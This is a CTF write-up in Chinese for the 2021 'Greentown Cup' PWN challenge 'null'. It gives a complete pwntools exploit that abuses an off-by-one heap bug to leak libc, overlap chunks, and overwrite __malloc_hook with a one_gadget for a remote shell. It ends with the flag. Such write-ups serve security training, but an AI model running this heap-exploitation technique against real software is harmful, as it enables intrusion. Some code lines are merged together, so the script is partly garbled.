2021年“绿城杯”网络安全大赛

网络安全大赛"/>

2021年“绿城杯”网络安全大赛

2021年“绿城杯”网络安全大赛-PWN-null

题目名称：null
题目内容：off by…
题目分值：100.0
题目难度：容易
相关附件：null的附件13.txt

解题思路：

1.检查保护

2.函数分析

题目给了四个重要函数，add，delete，edit，show
add()

delete()
edit()

show()

3.思路

发现有off by one漏洞，那我们利用off bye one + size错位
exp

from pwn import *binary = "./null_pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
# p = process(binary)
p = remote("82.157.5.28","51304")elf = ELF(binary)
libc = ELF(lib)
context.log_level = "debug"s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever:p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)def add(id,size,content):sal("Your choice :","1")sal("Index:",str(id))sal("Size of Heap : ",str(size))sa("Content?:",content)
def free(id):sal("Your choice :","2")sal("Index:",str(id))
def show(id):sal("Your choice :","4")sal("Index :",str(id))
def edit(id,content):sal("Your choice :","3")sal("Index:",str(id))sa("Content?:",content)add(0,0x88,"A")
add(1,0x18,"B")
free(0)
add(0,1,"A")
show(0)
libc.address = u64(ru("\x7f")[-6:]+"\x00\x00")-33-0x10 - libc.sym["__malloc_hook"]
info("libc base => 0x%x"%libc.address)
add(0,0x68,"A")add(0,0x18,"A")
add(1,0x18,"B")
add(2,0x68,"C")
add(3,0x18,"D")free(2)
edit(0,"\x00"*0x18+chr(0x71+0x20))
free(1)add(4,0x18,"E")
add(5,0x58,"F")
edit(5,p64(libc.sym["__malloc_hook"]-0x23))
add(6,0x68,"G")
add(7,0x68,"H")
# edit(7,"A")ogg = [_+libc.address for _ in (0x45226,0x4527a,0xf03a4,0xf1247)]
og  = ogg[1]
edit(7,"\x00"*(0x13-8)+p64(og)+p64(libc.sym["realloc"]+16)+"\n")sal("Your choice :","1")
sal("Index:",str(0))
sal("Size of Heap : ",str(0x20))sh()

DASCTF{e811a98a6a325d5519a3a8706c90c721}